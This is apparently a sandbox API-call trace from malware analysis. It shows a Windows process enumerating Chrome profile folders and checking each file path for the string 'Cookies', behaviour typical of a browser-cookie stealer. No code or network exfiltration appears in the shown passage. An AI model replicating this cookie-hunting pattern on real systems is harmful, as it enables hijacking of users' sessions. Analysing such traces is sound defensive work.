[0163.202] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001", lpSrch="Cookies") returned 0x0 [0163.202] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.202] GetProcessHeap () returned 0x8e0000 [0163.202] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0163.202] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0163.202] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0163.203] VirtualQuery (in: lpAddress=0x925630, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.203] GetProcessHeap () returned 0x8e0000 [0163.203] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925630 | out: hHeap=0x8e0000) returned 1 [0163.203] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.203] GetProcessHeap () returned 0x8e0000 [0163.203] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.203] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension Rules", cAlternateFileName="EXTENS~3")) returned 1 [0163.203] lstrcmpiW (lpString1="Extension Rules", lpString2=".") returned 1 [0163.203] lstrcmpiW (lpString1="Extension Rules", lpString2="..") returned 1 [0163.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.203] lstrlenW (lpString="\\") returned 1 [0163.203] GetProcessHeap () returned 0x8e0000 [0163.203] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.203] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.203] lstrlenW (lpString="Extension Rules") returned 15 [0163.203] GetProcessHeap () returned 0x8e0000 [0163.203] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0163.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.203] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.203] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.204] GetProcessHeap () returned 0x8e0000 [0163.204] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.204] lstrlenW (lpString="\\*.*") returned 4 [0163.204] GetProcessHeap () returned 0x8e0000 [0163.204] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925610 [0163.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*" [0163.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.205] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.205] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.205] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.205] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.205] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0163.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.205] lstrlenW (lpString="\\") returned 1 [0163.205] GetProcessHeap () returned 0x8e0000 [0163.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0163.205] lstrlenW (lpString="000003.log") returned 10 [0163.205] GetProcessHeap () returned 0x8e0000 [0163.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fcdb8 [0163.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" [0163.205] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.205] GetProcessHeap () returned 0x8e0000 [0163.205] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.205] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpSrch="Cookies") returned 0x0 [0163.205] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.205] GetProcessHeap () returned 0x8e0000 [0163.205] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0163.205] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82adc050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82adc050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0163.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.205] lstrlenW (lpString="\\") returned 1 [0163.205] GetProcessHeap () returned 0x8e0000 [0163.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0163.206] lstrlenW (lpString="CURRENT") returned 7 [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9257a0 [0163.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" [0163.206] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT", lpSrch="Cookies") returned 0x0 [0163.206] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.206] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82ad9940, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0163.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.206] lstrlenW (lpString="\\") returned 1 [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0163.206] lstrlenW (lpString="LOCK") returned 4 [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9257a0 [0163.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.206] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" [0163.206] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.206] GetProcessHeap () returned 0x8e0000 [0163.206] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.206] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK", lpSrch="Cookies") returned 0x0 [0163.206] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.207] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0163.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.207] lstrlenW (lpString="\\") returned 1 [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0163.207] lstrlenW (lpString="LOG") returned 3 [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9257a0 [0163.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" [0163.207] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG", lpSrch="Cookies") returned 0x0 [0163.207] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.207] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0163.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0163.207] lstrlenW (lpString="\\") returned 1 [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0163.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0163.207] lstrlenW (lpString="MANIFEST-000001") returned 15 [0163.207] GetProcessHeap () returned 0x8e0000 [0163.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9257a0 [0163.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS 